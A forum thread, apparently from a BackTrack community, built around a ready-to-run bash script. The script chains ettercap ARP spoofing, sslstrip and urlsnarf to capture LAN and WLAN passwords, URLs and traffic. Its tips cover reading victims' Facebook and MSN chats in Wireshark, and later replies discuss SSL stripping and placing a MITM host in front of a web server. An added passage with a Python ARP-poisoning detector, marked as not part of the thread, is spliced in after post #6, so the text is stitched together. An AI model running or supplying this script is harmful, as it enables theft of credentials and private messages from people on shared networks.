
Thread: Script for sniffing passwords and data on lan/wlan using ettercap, sslstrip, urlsnarf

  1. #1
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    6

    Script for sniffing passwords and data on lan/wlan using ettercap, sslstrip, urlsnarf

    UPDATED SCRIPT 27/4 - added tcpxtract
    UPDATE: How to find facebook chat messages...

    I got very tired of writing commands endlessly while pentesting my network. So I started writing scripts for everything I do. This script is the one I use most.
    I'm still very new at BackTrack/Linux, but this script really works for me, and I'm sure other beginners out there can put it to good use as well.

    First of all, make sure your etter.conf is default. Your etter.conf is located at /etc/etter.conf - this section must remain commented out:
    Code:
    # if you use iptables:
    #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    This is because I use ettercap to do the ARP spoofing, but I don't want it to do the fake certificate thing (we have sslstrip to do that job).

    Save this code to a new text file as anything.sh (make sure to make it executable: right-click -> Properties -> Permissions -> check "is executable").

    Code:
    #!/bin/bash
    # Leaving an answer blank means "yes"; any other text disables that step (see below).
    echo -n "Do you want to execute Wireshark when done? If yes, LEAVE BLANK "
    read -e NOYES
    echo -n "Do you want to extract pictures from the pcap via tcpxtract? If yes, LEAVE BLANK "
    read -e XTRACT
    echo -n "What interface to use? ie wlan0: "
    read -e IFACE
    echo -n "Name of \"Session\"? (name of the folder that will be created with all the log files): "
    read -e SESSION
    echo -n "Gateway IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
    read -e ROUTER
    echo -n "Target IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
    read -e VICTIM
    # One folder per session; every log file shares the session name as its base name
    mkdir -p "/root/$SESSION/"
    # Start from empty iptables rules
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    # sslstrip listens on its default port 10000; remember its PID so cleanup stops only this instance
    sslstrip -p -k -w "/root/$SESSION/$SESSION.log" &
    SSLSTRIP_PID=$!
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    # urlsnarf dumps every URL seen on the interface to a text file
    urlsnarf -i "$IFACE" | grep http > "/root/$SESSION/$SESSION.txt" &
    # ettercap runs in the foreground until you quit it with "q"; everything after it is cleanup
    ettercap -T -i "$IFACE" -w "/root/$SESSION/$SESSION.pcap" -L "/root/$SESSION/$SESSION" -M arp /$ROUTER/ /$VICTIM/
    # A blank answer leaves the variable empty, so the command runs as-is; any other
    # answer turns it into a non-existent command name, so the step is skipped
    "$XTRACT"tcpxtract -f "/root/$SESSION/$SESSION.pcap"
    "$NOYES"wireshark &
    # sslstrip runs as a python process, so "killall sslstrip" misses it and
    # "killall python" would also kill unrelated programs; use the saved PID instead
    kill "$SSLSTRIP_PID"
    killall urlsnarf
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    # Print the captured passwords from the ettercap info log
    etterlog -p -i "/root/$SESSION/$SESSION.eci"
    It's pretty straightforward...

    This script will execute sslstrip with a log file, urlsnarf (dumping all the URLs to a txt file), and ettercap with ARP spoofing, log files (with the passwords) and a pcap file (for further analysis). All the files are put in the same folder, with identical filenames (of course with different extensions).
    Furthermore, when quitting the script (and ettercap) properly with the key "q", the script will clean up after itself (shutting down sslstrip and urlsnarf and flushing iptables). Lastly, it automatically reads out the passwords from the ettercap log file (.eci) and runs Wireshark for further analysis.

    TIP: For me the easiest way to dump pictures from a pcap file (which the script generates) is by using NetworkMiner for Windows. It runs smoothly via wine if you tweak it a bit, like this tutorial shows: hxxp://geek00l.blogspot.com/2008/12/drunken-monkey-running-network-miner.html

    HOW TO FIND MSN/FACEBOOK CHAT IN WIRESHARK:
    Finding MSN chat is easy. There are many EXPRESSIONS in Wireshark; one has the name "MSNMS". If you apply that, it'll show you the messages.

    Finding Facebook chat is a bit more complicated. There is no EXPRESSION or filter to use. BUT I found out:
    CTRL+F brings up the search packet command. Search for: /ajax/chat/send.php
    ATTENTION: in the search box, check the option to search by "string", and under "search in" choose Packet List.

    That will give you the packets with the sent messages. When you select the packet, scroll down to the bottom and expand the "Line-based text data:"

    There you'll have the message if you look carefully.

    It's not that elegant...

    I have not tested this with getting a message back. But that should be fairly easy and almost the same. You can always start the sniffer, send a message or receive a message and then stop sniffing. Then open the pcap in Wireshark and look at the packets. Identify the one with the received message and find a way to search for such packets in the future.


    Feel free to ask any questions.

    Teddy Strand
    Last edited by tedbear; 04-27-2010 at 09:46 PM. Reason: updating script...

  2. #2
    Member
    Join Date
    Jan 2010
    Location
    Netherlands
    Posts
    84

    Re: Script for sniffing passwords and data on lan/wlan using ettercap, sslstrip, urls

    Looks nice, but why not use Wireshark instead?

  3. #3
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    6

    Re: Script for sniffing passwords and data on lan/wlan using ettercap, sslstrip, urls

    For me, Wireshark is far more advanced and time consuming. I use Wireshark to filter out other stuff, such as Facebook chat messages, MSN Messenger etc.

    Wireshark is also capable of showing these passwords, but I find the etterlog or the sslstrip log faster. That being said, I still have much to learn about Wireshark.

  4. #4
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    2


    hi tedbear,

    thanks for the script. I know the feeling of being tired of writing commands endlessly...:->

    I have a question though,

    In your script you specify iptables redirection to port 10000, but I don't see where you start listening for that port. Do I assume that you are already running an instance of sslstrip that listens to port 10000?

    Also, I have a general question about this sniffing strategy. Perhaps someone will be kind and answer.

    What if someone is running their web server on a different SSL port, say 8443...
    So for this technique to work properly, do we specify the prerouting dst port to be 8443?

    thanks in advance

    tedbear, please ignore my question about port 10000 in my previous post (well, if the moderators post it soon enough). I read more about sslstrip and figured out that it's the default port it listens on... duh.

    But I have another question, a bit off-topic, but about the topic.

    The attack you scripted above, as I understand (please correct me if I am wrong) works for the scenario below:

    Victim --- MITM --- Gateway

    Say if this passive attack is successful, then say (ie gmail) credentials of a user of host Victim will be logged in MITM host in clear text.

    However, what about this scenario, is it doable? :

    Victim ---- Gateway ---- MITM ---- Webserver (serves website via SSL).

    Hope someone can answer... haven't tried it yet. Just want to see what people think...

    I am new to this forum, and I see that posts need moderators approval... hopefully, my question will be posted.
    Last edited by Archangel-Amael; 04-24-2010 at 07:24 AM.

  5. #5
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    6

    Re: Script for sniffing passwords and data on lan/wlan using ettercap, sslstrip, urls

    As far as I know, the victim will never enter the SSL website at that port or any other port. Sslstrip "strips" the "s" off the https. So for this attack to work, the website visited by the victim has to support both http and https. I.e., visiting Gmail connects to their https site, but with sslstrip activated, the victim gets "redirected" or "stripped" to http instead.

    Not sure whether I'm explaining it so it's understandable?

  6. #6
    Member mixit's Avatar
    Join Date
    Jan 2010
    Posts
    104

    Re: Script for sniffing passwords and data on lan/wlan using ettercap, sslstrip, urls

    I believe that for the scenario

    Victim --- MITM --- Gateway

    when the victim goes to an https site, the website sends the user a certificate. The MITM intercepts that certificate and then sends the victim a fake certificate with a known encryption key. The victim sends the MITM the encrypted credentials, which the MITM can decrypt since he sent the fake certificate to them with a known key. Once decrypted, the MITM encrypts the credentials with the real certificate key and sends it along to the website.

    Also, for the scenario

    Victim ---- Gateway ---- MITM ---- Webserver

    I'm assuming you're talking about a basic NAT situation with a DHCP router or something in a home. In this case, a MITM attack will not work. A MITM attack is based on the ARP protocol, which is only used in LANs. Read up on basic networking if you are unfamiliar with this.
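Post #6 above explains why the script from post #1 only works on the local segment: it rests on ARP replies re-mapping the gateway's IP to the attacker's MAC. The detector below is an added example that is not part of the thread; it applies the two checks a tool like arpwatch makes (an IP whose MAC changes, and one MAC claiming several IPs) to a constructed set of ARP replies, with the gateway address and all MACs being assumed sample values.

```python
from collections import defaultdict

GATEWAY_IP = "192.168.1.1"   # assumed gateway address of the sample LAN

# Constructed sample ARP replies as (time, sender IP, sender MAC). The gateway's
# real MAC is aa:...:01; a third host (cc:...:03) later announces itself as both
# the gateway and host .20, which is what poisoning both sides of a session looks like.
SAMPLE_ARP_REPLIES = [
    ("10:00:01", "192.168.1.1",  "aa:aa:aa:aa:aa:01"),
    ("10:00:02", "192.168.1.20", "bb:bb:bb:bb:bb:02"),
    ("10:00:03", "192.168.1.30", "cc:cc:cc:cc:cc:03"),
    ("10:00:10", "192.168.1.1",  "cc:cc:cc:cc:cc:03"),  # gateway IP re-mapped
    ("10:00:11", "192.168.1.20", "cc:cc:cc:cc:cc:03"),  # victim IP re-mapped
]


def detect_arp_poisoning(replies, gateway_ip=GATEWAY_IP):
    """Return alert strings for the two classic signs of ARP cache poisoning:
    an IP whose MAC changes (critical when it is the gateway) and one MAC
    that ends up claiming several IPs at once."""
    ip_to_mac = {}                 # last MAC seen for each IP
    mac_to_ips = defaultdict(set)  # every IP each MAC has claimed so far
    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()
        previous = ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            severity = "CRITICAL" if ip == gateway_ip else "WARNING"
            alerts.append(f"{ts} {severity}: {ip} changed from {previous} to {mac}")
        ip_to_mac[ip] = mac
        if ip not in mac_to_ips[mac]:
            mac_to_ips[mac].add(ip)
            if len(mac_to_ips[mac]) > 1:
                claimed = ", ".join(sorted(mac_to_ips[mac]))
                alerts.append(f"{ts} WARNING: {mac} now claims {claimed}")
    return alerts


if __name__ == "__main__":
    for line in detect_arp_poisoning(SAMPLE_ARP_REPLIES):
        print(line)
```

On a real host the replies would come from a capture or from periodic reads of the ARP table; a static ARP entry for the gateway on the client, or Dynamic ARP Inspection on a managed switch, stops the re-mapping rather than just reporting it.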

  7. #7
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    2

    Re: Script for sniffing passwords and data on lan/wlan using ettercap, sslstrip, urls

    Thanks for your replies.

    However, I am not talking about a basic NAT situation, or a home LAN.

    Let me add clarity:

    Assume a hypothetical situation. There is a webserver, a router (use Cisco for this example), and a victim (or victims). Say an adversary is able to do a MITM attack between the webserver and the default router the server talks to (that is: the MITM host is on that VLAN; assume ARP poisoning is possible).

    Router <-----> MITM (host) <------> Webserver

    Where: Router (downstream net interface), MITM host, Webserver are all in the same subnet. Now, to add more roadblocks to this scenario, let's assume the webserver only provides its services (ie web mail) via SSL.

    So, if at all possible, given the tools used in scenario 1, how would the attack tactic or strategy change for the latter situation?

    Thoughts?


    Disclaimer: The example and the scenario provided above is hypothetical only. The question is asked for educational purposes only. Any information, suggestion, or input provided to answer the question above will NOT be used to perform any illegal activity.

    UPDATE:
    After playing around a bit, I realized that the situation is trivial for the scenario 2.
    All you need to do is to switch "places" . I hope that makes sense...

    I tested it, works perfectly.


    But, can anybody answer this stupid question:

    How to get the deciphered version of the Digest Authorization password???
    Last edited by iz3us; 04-26-2010 at 08:43 PM. Reason: disclaimer

  8. #8
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    8

    Re: Script for sniffing passwords and data on lan/wlan using ettercap, sslstrip, urls

    Thanks for the nice script!

    But how should I use sslstrip with a proxy server?

  9. #9
    Just burned his ISO
    Join Date
    Jun 2010
    Posts
    1

    Re: Script for sniffing passwords and data on lan/wlan using ettercap, sslstrip, urls

    Quote Originally Posted by PipeDevil:
    Thanks for nice script!

    But how should i use sslstrip with a proxy server?
    I agree with this. I've followed the tutorials, but all I got was just the proxy authentication prompt (the proxy user and password prompt, unencrypted). I cannot see the other user/pass such as Facebook, Gmail etc., not even without https.

    Thanks for caring, and sorry for my English, it is lacking.

  10. #10
    Just burned his ISO
    Join Date
    Jun 2010
    Posts
    3

    Re: Script for sniffing passwords and data on lan/wlan using ettercap, sslstrip, urls

    Would sites with Extended Validation (EV) give a warning screen about a MITM attack in Firefox?
